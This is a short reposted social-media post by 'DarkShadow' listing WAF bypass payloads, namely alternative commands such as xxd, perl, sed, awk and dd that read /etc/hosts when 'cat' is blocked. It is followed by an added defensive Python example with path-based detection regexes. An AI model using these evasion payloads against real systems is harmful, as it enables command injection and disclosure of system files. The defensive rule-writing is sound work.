A WAF bypass for an information disclosure vulnerability has been discovered. The payload 'cat /etc/hosts' triggers the WAF; the bypass reads the same '/etc/hosts' file with other commands such as xxd, xargs, perl, sed, awk, and dd. More details to follow in the next post by …DarkShadow…
Part-2
Crazy WAF Bypass:
cat /etc/hosts – triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
"More in next post"
For more follow …DarkShadow…
— dark shadow (@darkshadow2bd) March 18, 2025
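For defenders, the list above shows why a rule keyed on the reader command fails while one keyed on the file being read does not. The following is an added example, not part of the original post: COMMAND_RULE is an assumption about how the bypassed WAF matched (the post does not say), and PATH_RULE, SHELL_RULE and the benign samples are hypothetical and constructed for illustration.

```python
import re

# Payload strings as listed in the post (xargs delimiter written as '\n').
PAYLOADS = [
    "cat /etc/hosts",
    "xxd -p /etc/hosts | xxd -p -r",
    r"xargs -d '\n' -I{} echo {} < /etc/hosts",
    "perl -pe '' /etc/hosts",
    "sed '' /etc/hosts",
    "awk '{print}' /etc/hosts",
    "dd if=/etc/hosts 2>/dev/null",
]
# Constructed benign values, to check the rules do not fire on ordinary input.
BENIGN = ["category=hosts", "how do I edit the etc hosts file", "/docs/etc/hosts.html"]

# Assumption: the bypassed rule keys on the reader command (not stated in the post).
COMMAND_RULE = re.compile(r"\bcat\s+/etc/")
# Hypothetical replacement: key on the sensitive path, whatever command reads it.
PATH_RULE = re.compile(r"(?<![\w.-])/(?:etc|proc|root|var/log)/[\w./-]+")
# Secondary signal: shell redirection, pipes or a dd-style if= operand.
SHELL_RULE = re.compile(r"[|<>;&`$]|\bif=")


def command_rule_hits(value):
    return bool(COMMAND_RULE.search(value))


def inspect(value):
    """Return the reasons a parameter value should be blocked (empty = allow)."""
    reasons = []
    match = PATH_RULE.search(value)
    if match:
        reasons.append("sensitive-path:" + match.group(0))
    if SHELL_RULE.search(value):
        reasons.append("shell-syntax")
    return reasons


def missed_by_command_rule(payloads):
    """Payloads the command-name rule lets through but the path rule catches."""
    return [p for p in payloads if not command_rule_hits(p) and inspect(p)]


if __name__ == "__main__":
    for p in PAYLOADS + BENIGN:
        print(f"{command_rule_hits(p)!s:5} {inspect(p)!s:45} {p}")
```

Pattern matching of this kind is only a compensating control; the underlying fix is to stop passing request input to a shell at all.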